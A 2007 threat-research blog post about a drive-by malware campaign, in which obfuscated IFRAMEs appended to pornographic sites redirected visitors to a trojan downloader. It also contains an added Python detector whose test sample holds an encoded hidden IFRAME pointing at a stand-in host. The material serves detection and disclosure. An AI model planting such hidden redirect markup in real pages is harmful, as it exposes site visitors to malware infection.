Pornography is BAD for you!
June 22nd, 2007 by Ryan Flores (Advanced Threats Researcher)
Be careful when searching for porn sites: you may get other forms of “malicious” content that are definitely undesirable.
Just a few days after the infamous Italian Job malware, Trend Micro found another one with a similar modus operandi, but instead of hacked Italian web sites, the infection chain starts on certain pornographic sites.
The pornographic sites, which tend to specialize in incestuous content, have obfuscated IFRAME code appended at the end of their HTML code. This IFRAME redirects to another domain, which serves a script file that downloads a copy of TROJ_AGENT.QMN. Right now, we are not sure whether the porn sites were compromised to host the IFRAMEs, were created to do so, or are being paid to host them.
The detections for web pages containing the obfuscated IFRAME code, as well as for the script file that downloads TROJ_AGENT.QMN, are still being created as of this writing.
This particular attack uses the toolkit MPack v0.86, the same one used in the Italian Job attack. Despite having only 197 domains with IFRAMEs (compared to the Italian Job’s 10,000++ domains), it has been able to infect twice as many as the Italian Job.
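A defender-side check for the pattern described above, as an added example that is not Trend Micro’s detection logic: it flags IFRAMEs that appear after a page’s closing `</html>` tag, either in plain form or percent-encoded. The percent-encoded (`unescape`) obfuscation style, the function names and the `redirector.example` host are assumptions; the post does not say how the IFRAME was obfuscated.

```python
import re
from urllib.parse import unquote

_HTML_END = re.compile(r"</html\s*>", re.I)
_IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
_SRC = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)

# Constructed sample pages (not taken from the real campaign).
CLEAN = '<html><body><iframe src="/menu.html"></iframe></body></html>\n'
INFECTED = CLEAN + (
    "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//"
    "redirector.example/x%22%20width%3D0%20height%3D0%3E%3C/iframe%3E'))</script>"
)


def trailing_markup(html):
    """Return whatever follows the last </html> tag ('' if nothing does)."""
    ends = list(_HTML_END.finditer(html))
    return html[ends[-1].end():].strip() if ends else ""


def decode_layers(text, max_rounds=3):
    """Undo percent-encoding until the text stops changing (assumed obfuscation)."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_appended_iframes(html):
    """Return the src of every IFRAME hidden in markup appended after </html>."""
    tail = trailing_markup(html)
    if not tail:
        return []
    sources = []
    for tag in _IFRAME.findall(decode_layers(tail)):
        match = _SRC.search(tag)
        sources.append(match.group(1) if match else "")
    return sources


if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("infected", INFECTED)):
        print(name, find_appended_iframes(page))
```

An IFRAME inside the document body is deliberately ignored; only markup after the closing tag is inspected, since a legitimate page has nothing but whitespace there.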
This attack most likely went online sometime last week, around June 17, based on Trend Micro’s World Virus Tracking Center.
Update: The pages containing the obfuscated IFRAME code will now be detected as HTML_IFRAME.CV and the file that downloads TROJ_AGENT.QMN will be detected as JS_DLOADER.NUF. You may now view the reports for these malware in our Virus Encyclopedia.


